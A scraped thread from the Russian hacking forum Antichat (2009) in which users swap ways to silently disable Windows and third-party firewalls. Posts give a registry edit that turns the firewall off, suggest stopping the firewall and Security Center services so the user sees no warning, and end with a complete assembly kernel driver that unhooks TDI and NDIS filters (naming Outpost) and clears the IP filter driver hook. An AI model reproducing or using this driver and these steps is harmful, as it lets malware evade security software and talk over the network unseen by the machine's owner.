Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

28.04.2009, 21:28
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме: 3008839
Репутация:
1502
|
|
Сообщение от slesh
запуск процесса в скрытом виде карается порой визгами свиней товарища касперского.
зато пропись в доверенные приложения видовс файрвола касперского точно вынесет))) интересно, программы умеют выходить из строя от смеха?)
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|

29.04.2009, 10:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме: 3288241
Репутация:
3349
|
|
<offtop>
Умеют кончено же, если юзверь будет смеяться сильно и уронит системник )))
</offtop>
|
|
|

29.04.2009, 12:54
|
|
Познающий
Регистрация: 03.02.2007
Сообщений: 64
Провел на форуме: 287476
Репутация:
30
|
|
Сообщение от xismyname
А netsh чем тебе не комманда ?
Напиши в консоль netsh
Уже сам добрался и до нее, но все равно спасибо за помощь!!!
|
|
|

30.04.2009, 20:51
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме: 905389
Репутация:
332
|
|
) хоть и разобрался но добавлю... насколько я понмю можно отключить брэндмауэр через реестр...
идем в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess\Parameters\FirewallPolicy\Standard Profile\
и задаем значение параметра EnableFirewall (dword) равным 0
и изменения вступят в силу но только поле перезагрузки...
еще в этом же ключе есть такой параметр как:
DoNotAllowExceptions - не разрешать исключения, если этот параметр равен 1, то пример slesh"а (програмно записать в список исключений) к сожалению будет бесполезен если к нему не дописать пару строчек...
так что можеш попробовать еще так отключить может быть получится)
|
|
|

23.07.2009, 19:31
|
|
Познающий
Регистрация: 03.02.2007
Сообщений: 64
Провел на форуме: 287476
Репутация:
30
|
|
Сообщение от KIR@PRO
) хоть и разобрался но добавлю... насколько я понмю можно отключить брэндмауэр через реестр...
С реестром есть маленький косячокс, очень многие педантичные люди ставят программу, щас не вспомню как называеться, которая следит за всеми изменениями в записях реестра. Так что вариант отключения файрвола через реестр хоть и актуальна, но для меня не приемлемма.
Я предпочел написать простой батничег, который собственно и отключит файрвол, в момент запуска виндовс.
Кстати, вел небольшую статистику, из нее зделал вывод:
Люди которые насамом деле понимают всю серьезность опастности - гораздо реже пользуются антивирусами, не же ли простые юзвери )))
Спасибо за пост, может кому пригодиться.
|
|
|

24.07.2009, 19:45
|
|
Постоянный
Регистрация: 19.10.2007
Сообщений: 794
Провел на форуме: 1013791
Репутация:
711
|
|
стопорнуть программно службу фаервола а чтоб центр безопасности не кричал про остановку фаера, стопорнуть и его предварительно.
|
|
|

25.07.2009, 21:06
|
|
Участник форума
Регистрация: 29.07.2008
Сообщений: 128
Провел на форуме: 225836
Репутация:
34
|
|
Код:
.386
.model flat, stdcall
option casemap:none
include ddk\ntddk.inc
include ddk\ntoskrnl.inc
include Strings.inc
NDIS40 equ 1
include ddk\ndis.inc
include ddk\ipfirewall.inc
includelib ntoskrnl.lib
includelib ndis.lib
; by MaD [ mad-factor@mail.ru ] 01/08/2006
.code
; ---------------------------------------------------------------------------------------
; Процедуры-заглушки, для регистрации NDIS протокола
BindAdapterStub proc pStatus, BindContext, pDeviceName, pSS1, pSS2
ret
BindAdapterStub endp
UnbindAdapterStub proc pStatus, BindContext, pUnbindContext
ret
UnbindAdapterStub endp
; ---------------------------------------------------------------------------------------
; Процедура, удаляющая перехват Outpost'а на уровне обработчика NDIS
RemoveNdisProcHook proc Handler :PVOID
mov ecx, Handler
jecxz @ret
cmp byte ptr [ecx], 0E8h ; В начале должен стоять call
jnz @ret
mov edx, [ecx+1] ; Смещение call'а
lea edx, [ecx+edx+5] ; EDX указывает на то, куда идет вызов call'а
.if dword ptr [edx] == 03C08358h ; В начале стоит: pop eax / add eax, 3 - это Outpost 4.0
mov edx, [ecx+8]
.elseif dword ptr [edx] == 6030FF58h ; В начале стоит: pop eax / push [eax] / pushad - это Outpost 3.x
mov edx, [ecx+5]
.else
jmp @ret
.endif
; В EDX адрес реального обработчика
mov byte ptr [ecx], 0E9h ; Превратим call в jmp
sub edx, ecx
sub edx, 5
mov [ecx+1], edx ; Теперь вместо передачи управления фаеру, будет jmp сразу на реальный обработчик
@ret:
ret
RemoveNdisProcHook endp
DriverEntry proc uses esi edi ebx pDriverObject :PDRIVER_OBJECT, pusRegistryPath :PUNICODE_STRING
LOCAL NdisProto :NDIS_PROTOCOL_CHARACTERISTICS
LOCAL NdisStatus :NDIS_STATUS
LOCAL NdisProtoHandle :NDIS_HANDLE
LOCAL TcpipDrvObj :PDRIVER_OBJECT
LOCAL IpFilterFileObj :PFILE_OBJECT
LOCAL IpFilterDevObj :PDEVICE_OBJECT
LOCAL InBuff :DWORD
; 1) -> Снимаем перехват на уровне TDI (универсальный способ для обхода всех TDI-фаеров)
invoke ObReferenceObjectByName, $CCOUNTED_UNICODE_STRING("\\Driver\\Tcpip"), OBJ_CASE_INSENSITIVE, NULL, 0, \
IoDriverObjectType, KernelMode, NULL, addr TcpipDrvObj
test eax, eax
jnz @ret
mov eax, TcpipDrvObj
mov ebx, (DRIVER_OBJECT ptr [eax]).DeviceObject
assume ebx : ptr DEVICE_OBJECT ; EBX -> текущее устройство
; Перечисляем все устройства драйвера Tcpip.sys:
; \Device\Ip, \Device\RawIp, \Device\Tcp, \Device\Udp, \Device\IPMULTICAST
@enum_devices:
and [ebx].AttachedDevice, 0 ; Перехват снят
mov ebx, [ebx].NextDevice
test ebx, ebx
jnz @enum_devices
assume ebx : nothing
invoke ObDereferenceObject, TcpipDrvObj
; 2) -> Удаляем перехват на уровне NDIS (убираем перехват обработчиков протоколов)
lea edi, NdisProto
mov ecx, sizeof NdisProto
xor eax, eax
rep stosb
mov NdisProto.MajorNdisVersion, 4
mov NdisProto.BindAdapterHandler, BindAdapterStub
mov NdisProto.UnbindAdapterHandler, UnbindAdapterStub
; Регистрируем NDIS-протокол для того чтобы получить указатель на связный список протоколов
invoke NdisRegisterProtocol, addr NdisStatus, addr NdisProtoHandle, addr NdisProto, sizeof NdisProto
cmp NdisStatus, NDIS_STATUS_SUCCESS
jnz @ret
mov ebx, NdisProtoHandle ; EBX -> текущий протокол
assume ebx : ptr NDIS_PROTOCOL_BLOCK
mov ebx, [ebx].Next ; Скорее всего указывает на протокол TCPIP_WANARP
invoke NdisDeregisterProtocol, addr NdisStatus, NdisProtoHandle
; Перечисляем все зарегистрированные NDIS-протоколы
@enum_protocols:
; Удаляем перехват обработчиков NDIS-протокола
invoke RemoveNdisProcHook, [ebx].OpenAdapterCompleteHandler
invoke RemoveNdisProcHook, [ebx].SendCompleteHandler
invoke RemoveNdisProcHook, [ebx].TransferDataCompleteHandler
invoke RemoveNdisProcHook, [ebx].RequestCompleteHandler
invoke RemoveNdisProcHook, [ebx].ReceiveHandler
invoke RemoveNdisProcHook, [ebx].StatusHandler
invoke RemoveNdisProcHook, [ebx].ReceivePacketHandler
invoke RemoveNdisProcHook, [ebx].BindAdapterHandler
invoke RemoveNdisProcHook, [ebx].UnbindAdapterHandler
mov esi, [ebx].OpenBlock ; ESI -> текущий открытый блок
test esi, esi
jz @next
assume esi : ptr NDIS_OPEN_BLOCK
; Перечисляем все открытые блоки этого протокола
@enum_open_blocks:
; Удаляем перехват обработчиков открытого блока
invoke RemoveNdisProcHook, [esi].SendHandler
invoke RemoveNdisProcHook, [esi].TransferDataHandler
invoke RemoveNdisProcHook, [esi].SendCompleteHandler
invoke RemoveNdisProcHook, [esi].TransferDataCompleteHandler
invoke RemoveNdisProcHook, [esi].ReceiveHandler
invoke RemoveNdisProcHook, [esi].RequestCompleteHandler
invoke RemoveNdisProcHook, [esi].ReceivePacketHandler
invoke RemoveNdisProcHook, [esi].SendPacketsHandler
invoke RemoveNdisProcHook, [esi].StatusHandler
mov esi, [esi].ProtocolNextOpen
test esi, esi
jnz @enum_open_blocks
assume esi : nothing
@next:
mov ebx, [ebx].Next
test ebx, ebx
jnz @enum_protocols
assume ebx : nothing
; 3) -> Отменяем фильтрацию в IpFilterDriver
invoke IoGetDeviceObjectPointer, $CCOUNTED_UNICODE_STRING("\\Device\\Ipfilterdriver"), \
GENERIC_READ or GENERIC_WRITE or SYNCHRONIZE, addr IpFilterFileObj, addr IpFilterDevObj
test eax, eax
jnz @ret
and InBuff, 0
invoke IoBuildDeviceIoControlRequest, IOCTL_IP_SET_FIREWALL_HOOK, IpFilterDevObj, addr InBuff, 4, 0, 0, 0, 0, 0
test eax, eax
jz @ret
invoke IoCallDriver, IpFilterDevObj, eax
@ret:
mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
end DriverEntry
Если помог то ставь плюсег
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|